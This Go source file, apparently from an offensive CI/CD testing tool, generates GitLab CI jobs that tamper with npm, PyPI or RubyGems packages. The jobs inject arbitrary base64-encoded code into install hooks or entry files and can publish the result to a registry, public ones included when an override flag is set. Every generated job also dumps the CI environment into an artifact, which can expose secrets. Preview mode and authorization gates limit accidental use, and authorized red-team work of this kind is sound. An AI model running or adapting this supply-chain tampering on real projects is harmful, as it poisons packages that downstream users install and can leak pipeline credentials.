package payloads

import (
	"encoding/base64"
	"fmt"
	"log/slog"
	"net"
	"net/url"
	"path"
	"regexp"
	"strings"
)

const (
	packageTamperPreview = "preview"
	packageTamperLive    = "live-publish"
)

var packageNameRe = regexp.MustCompile(`^[A-Za-z0-9@._/-]+$`)

// PackageTamperOptions configures a bounded package-tamper simulation. The
// generated job only creates a preview artifact unless LivePublish is enabled
// and both generation-time and runtime authorization gates are satisfied.
type PackageTamperOptions struct {
	Common               CommonOptions
	Ecosystem            string
	RegistryURL          string
	PackageName          string
	Trigger              string
	EntryFile            string
	InjectedScript       string
	CallbackURL          string
	LivePublish          bool
	PublishAuthorization string
	AllowPublicRegistry  bool
}

// NpmTamperOptions is retained for CLI and library compatibility. Legacy npm
// payloads are now preview-only and never discover packages, harvest tokens,
// execute injected hooks, or publish.
type NpmTamperOptions struct {
	Common         CommonOptions
	RegistryURL    string
	PackageName    string
	InjectedScript string
	CallbackURL    string
}

type packageTamperConfig struct {
	common        CommonOptions
	ecosystem     string
	registry      string
	packageName   string
	trigger       string
	entryFile     string
	injected      string
	mode          string
	authorization string
	image         string
}

// PackageTamperAuthorizationPhrase returns the exact acknowledgement required
// at generation time and again through GOGATOZ_PACKAGE_TAMPER_APPROVED when a
// live publishing job is started manually.
func PackageTamperAuthorizationPhrase(ecosystem, packageName string) string {
	return "publish:" + strings.ToLower(strings.TrimSpace(ecosystem)) + ":" + strings.TrimSpace(packageName)
}

// GeneratePackageTamperYAML returns a manual GitLab CI job for npm, PyPI, or
// RubyGems tamper testing. Preview mode is the default and never invokes a
// package manager. Live publishing requires explicit registry and package
// identities plus two authorization gates.
func GeneratePackageTamperYAML(options PackageTamperOptions) (string, error) {
	config, err := normalizePackageTamperOptions(options)
	if err != nil {
		return "", err
	}
	slog.Debug("generating package tamper payload",
		"ecosystem", config.ecosystem,
		"trigger", config.trigger,
		"mode", config.mode,
	)

	name, stage := config.common.defaults("package-tamper")
	script := buildPackageTamperScript(config)
	allowFailure := "true"
	if config.mode == packageTamperLive {
		allowFailure = "false"
		slog.Warn("generated live package publishing payload",
			"ecosystem", config.ecosystem,
			"registry", config.registry,
			"package", config.packageName,
		)
	}

	result := fmt.Sprintf(`# Auto-generated by GoGatoZ (Authorized Package Tamper Preview)
# Default behavior is preview-only: no install, import, hook execution, or publish.
stages: [%s]

%s:
  stage: %s
  image: %s%s
  script:
    - |
%s
  artifacts:
    when: always
    paths:
      - env.txt
      - package-tamper-results.txt
      - package-tamper-preview.tar.gz
      - tampered-package.json
  rules:
    - when: manual
  allow_failure: %s
`, stage, name, stage, config.image, tagsLine(config.common.Tags), indentScript(script, "      "), allowFailure)
	slog.Debug("generated package tamper payload", "ecosystem", config.ecosystem, "bytes", len(result))
	return result, nil
}

// GenerateNpmTamperYAML preserves the old API while changing its behavior to
// the safe generic preview path.
func GenerateNpmTamperYAML(options NpmTamperOptions) string {
	yaml, err := GeneratePackageTamperYAML(PackageTamperOptions{
		Common:         options.Common,
		Ecosystem:      "npm",
		RegistryURL:    options.RegistryURL,
		PackageName:    options.PackageName,
		Trigger:        "preinstall",
		InjectedScript: options.InjectedScript,
		CallbackURL:    options.CallbackURL,
	})
	if err == nil {
		return yaml
	}
	// A malformed legacy option must still fail closed. This no-op document is
	// valid YAML and cannot install, execute, or publish package content.
	return fmt.Sprintf("# GoGatoZ refused unsafe npm tamper options\nstages: [package-tamper]\npackage-tamper:\n  stage: package-tamper\n  script: [\"printf 'refused: %%s\\n' %q\"]\n  rules: [{when: manual}]\n", err.Error())
}

func normalizePackageTamperOptions(options PackageTamperOptions) (packageTamperConfig, error) {
	ecosystem := normalizePackageEcosystem(options.Ecosystem)
	if ecosystem == "" {
		return packageTamperConfig{}, fmt.Errorf("unsupported package tamper ecosystem %q (use npm, pypi, or rubygems)", options.Ecosystem)
	}
	trigger := strings.ToLower(strings.TrimSpace(options.Trigger))
	if trigger == "" {
		if ecosystem == "npm" {
			trigger = "postinstall"
		} else {
			trigger = "import"
		}
	}
	if err := validatePackageTrigger(ecosystem, trigger); err != nil {
		return packageTamperConfig{}, err
	}

	entryFile := strings.TrimPrefix(strings.TrimSpace(options.EntryFile), "./")
	if trigger == "import" {
		if err := validatePackageEntryFile(entryFile); err != nil {
			return packageTamperConfig{}, err
		}
	} else if entryFile != "" {
		return packageTamperConfig{}, fmt.Errorf("--tamper-entry-file is only valid with the import trigger")
	}

	packageName := strings.TrimSpace(options.PackageName)
	if packageName != "" && !packageNameRe.MatchString(packageName) {
		return packageTamperConfig{}, fmt.Errorf("package name contains unsupported characters")
	}
	registry := strings.TrimSpace(options.RegistryURL)
	if registry != "" {
		if err := validatePackageRegistry(registry); err != nil {
			return packageTamperConfig{}, err
		}
	}

	mode := packageTamperPreview
	authorization := ""
	if options.LivePublish {
		mode = packageTamperLive
		if packageName == "" {
			return packageTamperConfig{}, fmt.Errorf("package name is required for live publishing")
		}
		if registry == "" {
			return packageTamperConfig{}, fmt.Errorf("an explicit registry URL is required for live publishing")
		}
		expected := PackageTamperAuthorizationPhrase(ecosystem, packageName)
		if strings.TrimSpace(options.PublishAuthorization) != expected {
			return packageTamperConfig{}, fmt.Errorf("publish authorization must exactly equal %q", expected)
		}
		if isPublicPackageRegistry(registry) && !options.AllowPublicRegistry {
			return packageTamperConfig{}, fmt.Errorf("public registry publishing requires --tamper-allow-public-registry")
		}
		authorization = expected
	}

	injected := strings.TrimSpace(options.InjectedScript)
	if injected == "" {
		injected = defaultPackageTamperMarker(ecosystem, trigger)
	}
	image := strings.TrimSpace(options.Common.Image)
	if image == "" {
		image = defaultPackageTamperImage(ecosystem)
	}

	return packageTamperConfig{
		common: options.Common, ecosystem: ecosystem, registry: registry,
		packageName: packageName, trigger: trigger, entryFile: entryFile,
		injected: injected, mode: mode, authorization: authorization, image: image,
	}, nil
}

func normalizePackageEcosystem(value string) string {
	switch strings.ToLower(strings.TrimSpace(value)) {
	case "", "npm", "node", "nodejs":
		return "npm"
	case "pypi", "python", "pip":
		return "pypi"
	case "rubygems", "ruby", "gem":
		return "rubygems"
	default:
		return ""
	}
}

func validatePackageTrigger(ecosystem, trigger string) error {
	if trigger == "import" {
		return nil
	}
	if ecosystem == "npm" && (trigger == "preinstall" || trigger == "postinstall") {
		return nil
	}
	return fmt.Errorf("trigger %q is unsupported for %s", trigger, ecosystem)
}

func validatePackageEntryFile(entryFile string) error {
	if entryFile == "" {
		return fmt.Errorf("a relative target entry file is required for the import trigger")
	}
	cleaned := path.Clean(entryFile)
	if strings.ContainsRune(entryFile, '\x00') || strings.Contains(entryFile, `\`) ||
		path.IsAbs(entryFile) || cleaned == "." || cleaned == ".." ||
		strings.HasPrefix(cleaned, "../") || cleaned != entryFile {
		return fmt.Errorf("target entry file must be a canonical relative path")
	}
	return nil
}

func validatePackageRegistry(rawURL string) error {
	parsed, err := url.Parse(rawURL)
	if err != nil || parsed.Host == "" || parsed.User != nil || parsed.RawQuery != "" || parsed.Fragment != "" {
		return fmt.Errorf("registry must be an absolute HTTP(S) URL without credentials, query, or fragment")
	}
	switch strings.ToLower(parsed.Scheme) {
	case "https":
		return nil
	case "http":
		host := strings.ToLower(parsed.Hostname())
		ip := net.ParseIP(host)
		if host == "localhost" || (ip != nil && ip.IsLoopback()) {
			return nil
		}
		return fmt.Errorf("registry must use HTTPS unless it is loopback")
	default:
		return fmt.Errorf("registry must use HTTP(S)")
	}
}

func isPublicPackageRegistry(rawURL string) bool {
	parsed, err := url.Parse(rawURL)
	if err != nil {
		return false
	}
	host := strings.ToLower(parsed.Hostname())
	for _, publicHost := range []string{
		"registry.npmjs.org", "npmjs.org", "pypi.org", "upload.pypi.org",
		"rubygems.org", "api.rubygems.org",
	} {
		if host == publicHost || strings.HasSuffix(host, "."+publicHost) {
			return true
		}
	}
	return false
}

func defaultPackageTamperMarker(ecosystem, trigger string) string {
	switch ecosystem {
	case "npm":
		if trigger == "import" {
			return `console.warn("[gogatoz authorized package-tamper simulation]");`
		}
		return `node -e "console.log('[gogatoz authorized package-tamper simulation]')"`
	case "pypi":
		return `print("[gogatoz authorized package-tamper simulation]")`
	default:
		return `warn "[gogatoz authorized package-tamper simulation]"`
	}
}

func defaultPackageTamperImage(ecosystem string) string {
	switch ecosystem {
	case "pypi":
		return "python:3.13-alpine"
	case "rubygems":
		return "ruby:3.4-alpine"
	default:
		return "node:lts-alpine"
	}
}

func buildPackageTamperScript(config packageTamperConfig) string {
	var builder strings.Builder
	encoded := base64.StdEncoding.EncodeToString([]byte(config.injected))

	builder.WriteString("set -eu\n")
	builder.WriteString("_root=${CI_PROJECT_DIR:-$PWD}\n")
	builder.WriteString("_work=$(mktemp -d)\n")
	builder.WriteString("trap 'rm -rf \"$_work\"' EXIT\n")
	builder.WriteString("mkdir -p \"$_work/source\" \"$_work/dist\"\n")
	builder.WriteString("tar --exclude=.git -cf - . | tar -xf - -C \"$_work/source\"\n")
	builder.WriteString("printenv | sort > env.txt || true\n")
	fmt.Fprintf(&builder, "# mode=%s ecosystem=%s trigger=%s\n", config.mode, config.ecosystem, config.trigger)
	fmt.Fprintf(&builder, "printf 'mode=%%s\\necosystem=%%s\\ntrigger=%%s\\n' %q %q %q > \"$_root/package-tamper-results.txt\"\n",
		config.mode, config.ecosystem, config.trigger)
	fmt.Fprintf(&builder, "export GOGATOZ_TAMPER_SCRIPT_B64=%q\n", encoded)
	builder.WriteString(buildPackageInjectionScript(config))
	builder.WriteString("tar --exclude=.git -czf \"$_root/package-tamper-preview.tar.gz\" -C \"$_work/source\" .\n")

	if config.mode == packageTamperLive {
		builder.WriteString(buildLivePublishScript(config))
	} else {
		builder.WriteString("printf '%s\\n' '[+] Preview archive created; no package content was executed or published.'\n")
	}
	return builder.String()
}

func buildPackageInjectionScript(config packageTamperConfig) string {
	if config.ecosystem == "npm" && config.trigger != "import" {
		return fmt.Sprintf(`export GOGATOZ_TAMPER_HOOK=%q
export GOGATOZ_TAMPER_MANIFEST="$_work/source/package.json"
test -f "$GOGATOZ_TAMPER_MANIFEST"
node -e 'const fs=require("fs"); const p=JSON.parse(fs.readFileSync(process.env.GOGATOZ_TAMPER_MANIFEST,"utf8")); p.scripts=p.scripts||{}; p.scripts[process.env.GOGATOZ_TAMPER_HOOK]=Buffer.from(process.env.GOGATOZ_TAMPER_SCRIPT_B64,"base64").toString("utf8"); fs.writeFileSync(process.env.GOGATOZ_TAMPER_MANIFEST,JSON.stringify(p,null,2)+"\n")'
cp "$GOGATOZ_TAMPER_MANIFEST" "$_root/tampered-package.json"
`, config.trigger)
	}
	return fmt.Sprintf(`_entry="$_work/source/%s"
test -f "$_entry"
printf '\n' >> "$_entry"
printf '%%s' "$GOGATOZ_TAMPER_SCRIPT_B64" | base64 -d >> "$_entry"
printf '\n' >> "$_entry"
`, config.entryFile)
}

func buildLivePublishScript(config packageTamperConfig) string {
	var builder strings.Builder
	fmt.Fprintf(&builder, "_expected_approval=%q\n", config.authorization)
	builder.WriteString("if [ \"${GOGATOZ_PACKAGE_TAMPER_APPROVED:-}\" != \"$_expected_approval\" ]; then\n")
	builder.WriteString("  echo '[-] Refusing live publish: set the protected, masked GOGATOZ_PACKAGE_TAMPER_APPROVED variable to the documented package-specific phrase.' >&2\n")
	builder.WriteString("  exit 1\n")
	builder.WriteString("fi\n")
	builder.WriteString("printf '%s\\n' '[!] Runtime approval accepted; starting explicitly authorized live publish.'\n")

	switch config.ecosystem {
	case "npm":
		builder.WriteString("cd \"$_work/source\"\n")
		builder.WriteString("npm pack --ignore-scripts --pack-destination \"$_work/dist\"\n")
		builder.WriteString("_artifact=$(find \"$_work/dist\" -maxdepth 1 -type f -name '*.tgz' -print -quit)\n")
		builder.WriteString("test -n \"$_artifact\"\n")
		fmt.Fprintf(&builder, "npm publish \"$_artifact\" --ignore-scripts --registry %q\n", config.registry)
	case "pypi":
		builder.WriteString("# Live mode may execute the authorized project's Python build backend.\n")
		builder.WriteString("python -m build --no-isolation --outdir \"$_work/dist\" \"$_work/source\"\n")
		builder.WriteString("_artifact=$(find \"$_work/dist\" -maxdepth 1 -type f \\( -name '*.whl' -o -name '*.tar.gz' \\) -print -quit)\n")
		builder.WriteString("test -n \"$_artifact\"\n")
		fmt.Fprintf(&builder, "python -m twine upload --repository-url %q \"$_artifact\"\n", config.registry)
	case "rubygems":
		builder.WriteString("# Live mode may evaluate the authorized project's gemspec.\n")
		builder.WriteString("cd \"$_work/source\"\n")
		builder.WriteString("set -- ./*.gemspec\n")
		builder.WriteString("test \"$#\" -eq 1 && test -f \"$1\"\n")
		builder.WriteString("gem build \"$1\" --output \"$_work/dist/package.gem\"\n")
		fmt.Fprintf(&builder, "gem push \"$_work/dist/package.gem\" --host %q\n", config.registry)
	}
	builder.WriteString("printf '%s\\n' '[+] Authorized package publish command completed.'\n")
	return builder.String()
}
